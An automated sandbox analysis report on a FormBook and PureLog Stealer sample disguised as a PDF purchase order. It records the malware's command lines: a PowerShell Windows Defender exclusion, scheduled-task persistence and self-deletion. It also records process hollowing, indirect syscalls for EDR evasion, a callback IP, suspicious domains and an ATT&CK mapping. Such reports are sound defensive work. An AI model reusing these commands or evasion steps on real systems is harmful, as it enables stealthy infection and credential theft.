Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01668D6B mov eax, dword ptr fs:[00000030h]	7_2_01668D6B
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01658D20 mov eax, dword ptr fs:[00000030h]	7_2_01658D20
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015C6D10 mov eax, dword ptr fs:[00000030h]	7_2_015C6D10

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_003F9C10 SetUnhandledExceptionFilter,		11_2_003F9C10
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_003F95F0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		11_2_003F95F0

Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe

Network Connect: 38.150.29.115 80

Jump to behavior

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe"
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe"			Jump to behavior

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	NtQueueApcThread: Indirect: 0x153A4F2	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe	NtQueueApcThread: Indirect: 0x142A4F2	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe	NtClose: Indirect: 0x142A56C
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	NtClose: Indirect: 0x153A56C

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Memory written: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe	Memory written: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe base: 400000 value starts with: 4D5A			Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Section loaded: NULL target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Section loaded: NULL target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe	Section loaded: NULL target: C:\Windows\SysWOW64\systray.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe	Section loaded: NULL target: C:\Windows\SysWOW64\systray.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Thread register set: target process: 4084	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread register set: target process: 4084	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe	Thread register set: target process: 4084	Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Sample uses process hollowing technique

Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Section unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 3F0000			Jump to behavior
Source: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe	Section unmapped: C:\Windows\SysWOW64\systray.exe base address: AE0000			Jump to behavior

Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe"	Jump to behavior
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EqtGqZpPskFq" /XML "C:\Users\user\AppData\Local\Temp\tmpDEC3.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Process created: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe "C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EqtGqZpPskFq" /XML "C:\Users\user\AppData\Local\Temp\tmpF9FC.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe	Process created: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe "C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe"	Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe

Code function: 11_2_003F31A9 FreeSid,AllocateAndInitializeSid,FreeSid,AllocateAndInitializeSid,FreeSid,AllocateAndInitializeSid,FreeSid,AllocateAndInitializeSid,FreeSid,AllocateAndInitializeSid,FreeSid,AllocateAndInitializeSid,FreeSid,AllocateAndInitializeSid,FreeSid,AllocateAndInitializeSid,FreeSid,AllocateAndInitializeSid,FreeSid,AllocateAndInitializeSid,FreeSid,AllocateAndInitializeSid,FreeSid,AllocateAndInitializeSid,FreeSid,AllocateAndInitializeSid,FreeSid,AllocateAndInitializeSid,FreeSid,AllocateAndInitializeSid,FreeSid,AllocateAndInitializeSid,FreeSid,AllocateAndInitializeSid,FreeSid,AllocateAndInitializeSid,GetLengthSid,memset,GlobalAlloc,InitializeAcl,AddAccessAllowedAce,GetAce,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,GetSecurityDescriptorLength,MakeSelfRelativeSD,GetLastError,GlobalFree,GetLastError,FreeSid,

11_2_003F31A9

Source: C:\Windows\SysWOW64\msiexec.exe

Code function: 11_2_003F30F2 AllocateAndInitializeSid,GetLastError,GetLengthSid,FreeSid,GetLengthSid,memcpy,FreeSid,

11_2_003F30F2

Source: explorer.exe, 00000008.00000000.1427814386.00000000044D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3827232688.0000000001091000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000003.3080571976.0000000009378000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000008.00000002.3825434889.0000000000A20000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3827232688.0000000001091000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000000.1425636079.0000000001090000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000008.00000002.3827232688.0000000001091000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000000.1425636079.0000000001090000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: 0Program Manager
Source: explorer.exe, 00000008.00000002.3827232688.0000000001091000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000000.1425636079.0000000001090000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000008.00000003.3080571976.0000000009378000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1434261414.000000000937B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3078006004.000000000936E000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd]1Q

Source: C:\Windows\SysWOW64\msiexec.exe

Code function: memset,GetACP,LoadLibraryW,GetProcAddress,GetLocaleInfoW,FreeLibrary,FormatMessageW,memset,GetVersionExW,lstrlenW,WriteFile,WriteFile,

11_2_003F5C84

Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Queries volume information: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe	Queries volume information: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe

Code function: 11_2_003F9E35 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

11_2_003F9E35

Source: C:\Windows\SysWOW64\msiexec.exe

Code function: 11_2_003F5C84 memset,GetACP,LoadLibraryW,GetProcAddress,GetLocaleInfoW,FreeLibrary,FormatMessageW,memset,GetVersionExW,lstrlenW,WriteFile,WriteFile,

11_2_003F5C84

Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 7.2.RFQ31072024_August order_pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RFQ31072024_August order_pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.3827426798.0000000004A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.3827516855.0000000004A30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.1488235517.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.1533795210.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.3825026550.0000000002CF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1426588341.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected PureLog Stealer

Source: Yara match	File source: 0.2.RFQ31072024_August order_pdf.exe.6960000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.RFQ31072024_August order_pdf.exe.2514450.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.EqtGqZpPskFq.exe.2c24420.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.RFQ31072024_August order_pdf.exe.6960000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.RFQ31072024_August order_pdf.exe.2514450.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.EqtGqZpPskFq.exe.2c24420.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1425810196.00000000024F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1431768421.0000000006960000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1502952456.0000000002C01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 7.2.RFQ31072024_August order_pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RFQ31072024_August order_pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.3827426798.0000000004A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.3827516855.0000000004A30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.1488235517.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.1533795210.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.3825026550.0000000002CF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1426588341.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected PureLog Stealer

Source: Yara match	File source: 0.2.RFQ31072024_August order_pdf.exe.6960000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.RFQ31072024_August order_pdf.exe.2514450.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.EqtGqZpPskFq.exe.2c24420.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.RFQ31072024_August order_pdf.exe.6960000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.RFQ31072024_August order_pdf.exe.2514450.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.EqtGqZpPskFq.exe.2c24420.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1425810196.00000000024F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1431768421.0000000006960000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1502952456.0000000002C01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Native API	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	11 Disable or Modify Tools	OS Credential Dumping	1 System Time Discovery	Remote Services	11 Archive Collected Data	2 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Shared Modules	3 Windows Service	1 DLL Side-Loading	11 Deobfuscate/Decode Files or Information	LSASS Memory	1 File and Directory Discovery	Remote Desktop Protocol	Data from Removable Media	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	1 Access Token Manipulation	1 Abuse Elevation Control Mechanism	Security Account Manager	224 System Information Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	2 Service Execution	Login Hook	3 Windows Service	4 Obfuscated Files or Information	NTDS	331 Security Software Discovery	Distributed Component Object Model	Input Capture	12 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	612 Process Injection	22 Software Packing	LSA Secrets	2 Process Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	1 Scheduled Task/Job	1 DLL Side-Loading	Cached Domain Credentials	41 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Masquerading	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	41 Virtualization/Sandbox Evasion	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Access Token Manipulation	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	612 Process Injection	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
RFQ31072024_August order_pdf.exe	29%	ReversingLabs	Win32.Backdoor.FormBook
RFQ31072024_August order_pdf.exe	37%	Virustotal		Browse
RFQ31072024_August order_pdf.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe	29%	ReversingLabs	Win32.Backdoor.FormBook

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Link
www.startable.online	0%	Virustotal	Browse
kucinglucu.online	1%	Virustotal	Browse
thehalcyon.studio	1%	Virustotal	Browse
qdfake609am.xyz	1%	Virustotal	Browse
www.2025tengxun171.lat	0%	Virustotal	Browse
www.thehalcyon.studio	0%	Virustotal	Browse
www.realearthpower.com	0%	Virustotal	Browse
www.163875.shop	0%	Virustotal	Browse
www.ygyqpswy.xyz	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV	0%	URL Reputation	safe
https://api.msn.com:443/v1/news/Feed/Windows?	0%	URL Reputation	safe
https://excel.office.com	0%	URL Reputation	safe
https://powerpoint.office.comer	0%	Avira URL Cloud	safe
http://www.8548d.com	0%	Avira URL Cloud	safe
http://www.crucka.xyzReferer:	0%	Avira URL Cloud	safe
https://android.notify.windows.com/iOSA4	0%	Avira URL Cloud	safe
